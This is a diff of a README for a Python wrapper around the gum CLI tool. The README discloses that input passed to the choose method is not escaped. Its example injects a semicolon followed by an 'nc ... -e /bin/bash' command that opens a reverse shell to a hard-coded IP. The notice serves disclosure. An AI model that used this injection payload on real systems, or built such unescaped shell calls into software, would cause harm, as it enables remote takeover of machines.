idobarel/gum-python/README.md

 ```

 # Importent!
-I found a security issue with this package,
-the one who decide what list is going in as opt at the choose method for ex,
-getting a RCE.
-that's not supposed to be a problem if you dont let the user choose the content of the opt varieble
-malicius code example:
+The package itself doesn't escapes the users input, **the developer must sanitize the input**
+A malicius user can send an input that look like this:
 ```python
 import gum

 gum.choose([';', "nc 192.168.1.153 4444 -e /bin/bash"])
 ```
-Will spawn a reverse shell to the target.
+And it will spawn a reverse shell to the target.

 # Notice
-as it is for now, I have nothing to deal with the authours of the gum tool, I wanted it to be easier to use in big python applications, so I created this code.
+As it is for now, I have nothing to deal with the authours of the gum tool, I wanted it to be easier to use in big python applications, so I created this code.
 Just to clear any missunderstandings, all the credit and the notice should go to @charm or https://github.com/charmbracelet.

-Hope yall having a nice day!